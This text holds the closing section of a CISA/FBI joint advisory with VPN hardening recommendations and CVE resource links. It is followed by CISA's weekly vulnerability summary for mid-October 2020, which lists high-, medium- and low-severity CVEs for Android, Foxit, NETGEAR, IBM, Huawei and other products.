<li>Non-AD Privileged Application Accounts</li>
<li>Non-AD Unprivileged Application Accounts</li>
<li>Non-Windows Privileged Accounts</li>
<li>Non-Windows User Accounts</li>
<li>Windows Computer Accounts</li>
<li>Windows Local Admin</li>
</ul>

<h4>VPN Vulnerabilities</h4>

<p>Implement the following recommendations to secure your organization’s VPNs:</p>

<ul>
<li><strong>Update VPNs, network infrastructure devices, and devices</strong> being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>Understanding Patches and Software Updates</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates.</li>
<li><strong>Implement MFA on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-002″>Choosing and Protecting Passwords</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST05-012″>Supplementing Passwords</a> for more information.</li>
</ul>

<p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p>

<ul>
<li><strong>Audit </strong>configuration and patch management programs.</li>
<li><strong>Monitor </strong>network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).</li>
<li><strong>Implement</strong> MFA, especially for privileged accounts.</li>
<li><strong>Use</strong> separate administrative accounts on separate administration workstations.</li>
<li><strong>Keep </strong><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>software up to date</a>. Enable automatic updates, if available.</li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”mailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<h3>Resources</h3>

<ul>
<li>APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>https://us-cert.cisa.gov/ncas/alerts/aa20-283a</a></li>
<li>CISA Activity Alert CVE-2019-19781 – <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-031a”>https://us-cert.cisa.gov/ncas/alerts/aa20-031a</a></li>
<li>CISA Vulnerability Bulletin – <a href=”https://us-cert.cisa.gov/ncas/bulletins/SB19-161″>https://us-cert.cisa.gov/ncas/bulletins/SB19-161</a></li>
<li>CISA Current Activity – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688″>https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688</a></li>
<li>Citrix Directory Traversal Bug (CVE-2019-19781) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</a></li>
<li>Microsoft Exchange remote code execution flaw (CVE-2020-0688) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>https://nvd.nist.gov/vuln/detail/CVE-2020-0688</a></li>
<li>CVE-2018-13379 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>https://nvd.nist.gov/vuln/detail/CVE-2018-13379</a></li>
<li>CVE-2020-1472 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>https://nvd.nist.gov/vuln/detail/CVE-2020-1472</a></li>
<li>CVE-2019-10149 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>https://nvd.nist.gov/vuln/detail/CVE-2019-10149</a></li>
<li>NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A”>https://us-cert.cisa.gov/ncas/alerts/TA15-314A</a></li>
<li>NCCIC/US-CERT publication on SMB Security Best Practices – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</a></li>
</ul>

<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>

<div class=”special_container”>
<p><em>This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>

<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p>
</div>

<h3>References</h3>
<ul> <li><a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>[1] Microsoft: AD Forest Recovery – Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 22, 2020: Initial Version</li> <li>November 17, 2020: Added U.S. Heat Map of Activity</li> </ul>
<hr />


Vulnerability Summary for the Week of October 12, 2020

Original release date: October 19, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
foxitsoftware — foxit_reader This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PhantomPDF 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit PhantomPDF Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11308. 2020-10-13 7.2 CVE-2020-17415
N/A
N/A
foxitsoftware — foxit_reader This vulnerability allows local attackers to escalate privileges on affected installations of Foxit Reader 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit Reader Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11229. 2020-10-13 7.2 CVE-2020-17414
N/A
N/A
google — android In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-155288585 2020-10-14 9.3 CVE-2020-0416
MISC
google — android In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158833854 2020-10-14 7.8 CVE-2020-0377
MISC
google — android In setUpdatableDriverPath of GpuService.cpp, there is a possible memory corruption due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-162383705 2020-10-14 7.2 CVE-2020-0420
MISC
google — android In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161894517 2020-10-14 7.2 CVE-2020-0421
MISC
google — android There is a possible out of bounds write due to a missing bounds check. Product: Android Versions: Android SoC Android ID: A-163008257 2020-10-14 9.4 CVE-2020-0283
MISC
google — android There is a possible out of bounds read due to a missing bounds check. Product: Android Versions: Android SoC Android ID: A-163003156 2020-10-14 9.4 CVE-2020-0376
MISC
google — android There is a possible out of bounds read due to a missing bounds check. Product: Android Versions: Android SoC Android ID: A-163008256 2020-10-14 9.4 CVE-2020-0371
MISC
google — android There is a possible out of bounds write due to a missing bounds check. Product: Android Versions: Android SoC Android ID: A-162980455 2020-10-14 9.4 CVE-2020-0367
MISC
google — android There is a possible out of bounds read due to a missing bounds check. Product: Android Versions: Android SoC Android ID: A-162980705 2020-10-14 9.4 CVE-2020-0339
MISC
google — android In remove of String16.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10 Android ID: A-156999009 2020-10-14 7.2 CVE-2020-0408
MISC
huawei — p30_pro_firmware HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have an out-of-bounds read and write vulnerability. An unauthenticated attacker crafts a malformed message with a specific parameter and sends the message to the affected products. Insufficient validation of the message may be exploited to cause the process to reboot. 2020-10-12 7.1 CVE-2020-9108
MISC
huawei — p30_pro_firmware HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have an out-of-bounds read and write vulnerability. An unauthenticated attacker crafts a malformed message with a specific parameter and sends the message to the affected products. Insufficient validation of the message may be exploited to cause the process to reboot. 2020-10-12 7.1 CVE-2020-9107
MISC
ibm — cognos_analytics IBM Cognos Analytics 11.0 and 11.1 could allow a remote attacker to execute arbitrary code on the system, caused by a CSV injection. By persuading a victim to open a specially crafted Excel file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 176610. 2020-10-12 9.3 CVE-2020-4302
XF
CONFIRM
ibm — security_guardium IBM Security Guardium 11.2 is vulnerable to CSV injection. A remote privileged attacker could execute arbitrary commands on the system, caused by improper validation of CSV file contents. IBM X-Force ID: 186696. 2020-10-12 8.5 CVE-2020-4689
XF
CONFIRM
lenovo — diagnostics A DLL search path vulnerability was reported in Lenovo Diagnostics prior to version 4.35.4 that could allow a user with local access to execute code on the system. 2020-10-14 7.2 CVE-2020-8338
MISC
netgear — d6200_firmware Certain NETGEAR devices are affected by authentication bypass. This affects D6200 before 1.1.00.36, D7000 before 1.0.1.74, PR2000 before 1.0.0.30, R6020 before 1.0.0.42, R6050 before 1.0.1.22, JR6150 before 1.0.1.22, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6230 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R69002 before 1.2.0.62, and WNR2020 before 1.1.0.62. 2020-10-09 10 CVE-2020-26908
MISC
netgear — d7800_firmware Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D7800 before 1.0.1.58 and R7500v2 before 1.0.3.48. 2020-10-09 8.3 CVE-2020-26909
MISC
netgear — rbk752_firmware Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. 2020-10-09 8.3 CVE-2020-26902
MISC
netgear — rbk852_firmware Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, and RBS850 before 3.2.16.6. 2020-10-09 7.7 CVE-2020-26907
MISC


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
apache — fineract The implementation of POST with the username and password in the URL parameters exposed the credentials. More information is available in Fineract Jira issues 726 and 629. 2020-10-13 5 CVE-2018-20243
MISC
foxitsoftware — 3d This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11226. 2020-10-13 6.8 CVE-2020-17413
N/A
N/A
foxitsoftware — 3d This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11224. 2020-10-13 6.8 CVE-2020-17412
N/A
N/A
foxitsoftware — 3d This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-11190. 2020-10-13 4.3 CVE-2020-17411
N/A
N/A
foxitsoftware — foxit_reader This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of GIF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11135. 2020-10-13 6.8 CVE-2020-17410
N/A
N/A
garfield_petshop_project — garfield_petshop A cross-site request forgery (CSRF) vulnerability in mod/user/act_user.php in Garfield Petshop through 2020-10-01 allows remote attackers to hijack the authentication of administrators for requests that create new administrative accounts. 2020-10-09 6.8 CVE-2020-26522
MISC
MISC
MISC
MISC
google — android In getCarrierPrivilegeStatus of UiccAccessRule.java, there is a missing permission check. This could lead to local information disclosure of EID data with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android-11 Android ID: A-159062405 2020-10-14 4.9 CVE-2020-0246
MISC
google — android In ~AACExtractor() of AACExtractor.cpp, there is a possible out of bounds write due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-10 Android-11 Android ID: A-142641801 2020-10-14 4.3 CVE-2020-0411
MISC
google — android In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0 Android ID: A-158778659 2020-10-14 5 CVE-2020-0413
MISC
google — android In showDataRoamingNotification of NotificationMgr.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-11 Android-10 Android ID: A-153356561 2020-10-14 4.9 CVE-2020-0400
MISC
google — android In onWnmFrameReceived of PasspointManager.java, there is a missing permission check. This could lead to local information disclosure of location data with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android ID: A-157748906 2020-10-14 4.9 CVE-2020-0378
MISC
google — android In updateMwi of NotificationMgr.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android-11 Android ID: A-154323381 2020-10-14 4.9 CVE-2020-0398
MISC
google — android In SurfaceFlinger::createLayer of SurfaceFlinger.cpp, there is a possible arbitrary code execution due to improper casting. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-9 Android ID: A-137284057 2020-10-14 4.6 CVE-2019-2194
MISC
google — android In AudioFlinger::RecordThread::threadLoop of audioflinger/Threads.cpp, there is a possible non-silenced audio buffer due to a permissions bypass. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-10 Android-11 Android ID: A-157708122 2020-10-14 4.3 CVE-2020-0414
MISC
huawei — fusionaccess FusionAccess version 6.5.1 has an improper authorization vulnerability. A command is authorized with incorrect privilege. Attackers with other privilege can execute the command to exploit this vulnerability. This may compromise normal service of the affected product. 2020-10-12 4.6 CVE-2020-9090
MISC
ibm — cognos_analytics IBM Cognos Analytics 11.0 and 11.1 could be vulnerable to a denial of service attack by failing to catch exceptions in a servlet; the exposed debug information could also be used in future attacks. IBM X-Force ID: 179270. 2020-10-12 6.4 CVE-2020-4388
XF
CONFIRM
ibm — infosphere_information_server IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim’s Web browser within the security context of the hosting site. IBM X-Force ID: 188150. 2020-10-12 4.3 CVE-2020-4740
XF
CONFIRM
ibm — security_guardium IBM Security Guardium 11.2 could allow an attacker with admin access to obtain and read files that they normally would not have access to. IBM X-Force ID: 186423. 2020-10-12 4 CVE-2020-4678
XF
CONFIRM
linux — linux_kernel A flaw was found in the Linux kernel in versions before 5.9-rc7. Traffic between two Geneve endpoints may be unencrypted when IPsec is configured to encrypt traffic for the specific UDP port used by the GENEVE tunnel allowing anyone between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality. 2020-10-13 5 CVE-2020-25645
SUSE
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by command injection by an authenticated user. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25. 2020-10-09 5.2 CVE-2020-26910
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by authentication bypass. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 5.8 CVE-2020-26928
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by authentication bypass. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 5.8 CVE-2020-26926
MISC
netgear — d6100_firmware Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6100 before 1.0.0.63, R7800 before 1.0.2.60, R8900 before 1.0.4.26, R9000 before 1.0.4.26, RBK20 before 2.3.0.28, RBR20 before 2.3.0.28, RBS20 before 2.3.0.28, RBK50 before 2.3.0.32, RBR50 before 2.3.0.32, RBS50 before 2.3.0.32, RBK40 before 2.3.0.28, RBR40 before 2.3.0.28, RBS40 before 2.3.0.28, SRK60 before 2.2.2.20, SRR60 before 2.2.2.20, SRS60 before 2.2.2.20, WN3000RPv2 before 1.0.0.78, WNDR4300v2 before 1.0.0.58, WNDR4500v3 before 1.0.0.58, WNR2000v5 before 1.0.0.70, XR450 before 2.3.2.40, and XR500 before 2.3.2.40. 2020-10-09 5.2 CVE-2020-26913
MISC
netgear — d6200_firmware Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62. 2020-10-09 5.2 CVE-2020-26914
MISC
netgear — d6200_firmware Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.50, and WNR2020 before 1.1.0.62. 2020-10-09 5.8 CVE-2020-26916
MISC
netgear — d6200_firmware Certain NETGEAR devices are affected by lack of access control at the function level. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62. 2020-10-09 5.8 CVE-2020-26911
MISC
netgear — d6200_firmware Certain NETGEAR devices are affected by CSRF. This affects D6200 before 1.1.00.38, D7000 before 1.0.1.78, JR6150 before 1.0.1.24, R6020 before 1.0.0.42, R6050 before 1.0.1.24, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R6900v2 before 1.2.0.62, R7450 before 1.2.0.62, and WNR2020 before 1.1.0.62. 2020-10-09 6.8 CVE-2020-26912
MISC
netgear — ex7700_firmware NETGEAR EX7700 devices before 1.0.0.210 are affected by incorrect configuration of security settings. 2020-10-09 5.5 CVE-2020-26930
MISC
netgear — gs110emx_firmware Certain NETGEAR devices are affected by authentication bypass. This affects GS110EMX before 1.0.1.7, GS810EMX before 1.7.1.3, XS512EM before 1.0.1.3, and XS724EM before 1.0.1.3. 2020-10-09 5.8 CVE-2020-26921
MISC
netgear — r6230_firmware Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6220 before 1.1.0.100 and R6230 before 1.1.0.100. 2020-10-09 5.2 CVE-2020-26929
MISC
netgear — srk60_firmware Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects SRK60 before 2.5.3.110, SRR60 before 2.5.3.110, and SRS60 before 2.5.3.110. 2020-10-09 5.8 CVE-2020-26920
MISC
netgear — wc7500_firmware Certain NETGEAR devices are affected by command injection by an authenticated user. This affects WC7500 before 6.5.5.24, WC7600 before 6.5.5.24, WC7600v2 before 6.5.5.24, and WC9500 before 6.5.5.24. 2020-10-09 4.6 CVE-2020-26922
MISC
onwebchat — live_chat_-_live_support Cross-site request forgery (CSRF) vulnerability in Live Chat – Live support version 3.1.0 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2020-10-15 6.8 CVE-2020-5642
MISC
MISC
MISC
webmin — webmin XSS exists in Webmin 1.941 and earlier affecting the Save function of the Read User Email Module / mailboxes Endpoint when attempting to save HTML emails. This module parses any output without sanitizing SCRIPT elements, as opposed to the View function, which sanitizes the input correctly. A malicious user can send any JavaScript payload into the message body and execute it if the user decides to save that email. 2020-10-12 4.3 CVE-2020-12670
CONFIRM


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
google — android In setNotification of SapServer.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11 Android ID: A-156021269 2020-10-14 2.1 CVE-2020-0410
MISC
google — android In various locations in SystemUI, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure of contact data with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1 Android ID: A-156020795 2020-10-14 2.1 CVE-2020-0415
MISC
google — android In generateInfo of PackageInstallerSession.java, there is a possible leak of cross-profile URI data during app installation due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.1 Android-9 Android-10 Android-11 Android ID: A-142125338 2020-10-14 2.1 CVE-2020-0419
MISC
google — android In constructImportFailureNotification of NotificationImportExportListener.java, there is a possible permissions bypass due to an unsafe PendingIntent. This could lead to local information disclosure of contact data with User execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0 Android ID: A-161718556 2020-10-14 2.1 CVE-2020-0422
MISC
google — android In setProcessMemoryTrimLevel of ActivityManagerService.java, there is a missing permission check. This could lead to local information disclosure of foreground processes with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9 Android ID: A-160390416 2020-10-14 2.1 CVE-2020-0412
MISC
huawei — hirouter-cd30-10_firmware Some Huawei products have an insufficient input verification vulnerability. Attackers can exploit this vulnerability in the LAN to cause abnormal service on affected devices. Affected product versions include: HiRouter-CD30-10 version 10.0.2.5; HiRouter-CT31-10 version 10.0.2.20; WS5200-12 version 10.0.1.9; WS5281-10 version 10.0.5.10; WS5800-10 version 10.0.3.25; WS7100-10 version 10.0.5.21; WS7200-10 version 10.0.5.21. 2020-10-12 3.3 CVE-2020-9122
MISC
huawei — p30_pro_firmware HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have a path traversal vulnerability. The system does not sufficiently validate certain pathnames; a successful exploit could allow the attacker to access files and cause information disclosure. 2020-10-12 2.1 CVE-2020-9106
MISC
huawei — taurus-al00a_firmware Taurus-AL00A version 10.0.0.1(C00E1R1P1) has an out-of-bounds read vulnerability in the XFRM module. An authenticated, local attacker may perform a specific operation to exploit this vulnerability. Insufficient validation of the parameters may be exploited to cause an information leak. 2020-10-12 2.1 CVE-2020-9087
MISC
huawei — taurus-an00b_firmware Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a buffer overflow vulnerability. A function in a module does not verify inputs sufficiently. Attackers can exploit this vulnerability by sending a specific request. This could compromise normal service of the affected device. 2020-10-12 3.3 CVE-2020-9238
MISC
huawei — taurus-an00b_firmware Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a buffer overflow vulnerability. A function in a module does not verify inputs sufficiently. Attackers can exploit this vulnerability by sending a specific request. This could compromise normal service of the affected device. 2020-10-12 2.1 CVE-2020-9240
MISC
huawei — taurus-an00b_firmware Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an information disclosure vulnerability. The device does not sufficiently validate the output of the device in a certain specific scenario; the attacker can gain information in the victim’s smartphone to launch the attack, and a successful exploit could cause information disclosure. 2020-10-12 2.1 CVE-2020-9110
MISC
huawei — taurus-an00b_firmware Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have an out-of-bounds read and write vulnerability. Some functions do not verify inputs sufficiently. Attackers can exploit this vulnerability by sending a specific request. This could compromise normal service of the affected device. 2020-10-12 2.1 CVE-2020-9091
MISC
huawei — ws5800-10_firmware WS5800-10 version 10.0.3.25 has a denial of service vulnerability. Due to improper verification of a specific message, an attacker may exploit this vulnerability to cause a specific function to become abnormal. 2020-10-12 3.3 CVE-2020-9230
MISC
ibm — curam_social_program_management A cross-site scripting (XSS) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. This vulnerability allows attackers to inject malicious scripts into web applications for the purpose of running unwanted actions on the end user’s device, restricted to a single location. IBM X-Force ID: 189153. 2020-10-12 3.5 CVE-2020-4775
XF
CONFIRM
ibm — infosphere_information_server IBM InfoSphere Information Server 11.5 and 11.7 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188197. 2020-10-12 3.5 CVE-2020-4741
XF
CONFIRM
ibm — security_guardium IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186424. 2020-10-12 3.5 CVE-2020-4679
XF
CONFIRM
ibm — security_guardium IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186427. 2020-10-12 3.5 CVE-2020-4681
XF
CONFIRM
ibm — security_guardium IBM Security Guardium 11.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 186426. 2020-10-12 3.5 CVE-2020-4680
XF
CONFIRM
netgear — cbr40_firmware Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 3.3 CVE-2020-26905
MISC
netgear — cbr40_firmware Certain NETGEAR devices are affected by disclosure of administrative credentials. This affects CBR40 before 2.5.0.10, RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, and RBS850 before 3.2.10.11. 2020-10-09 3.3 CVE-2020-26904
MISC
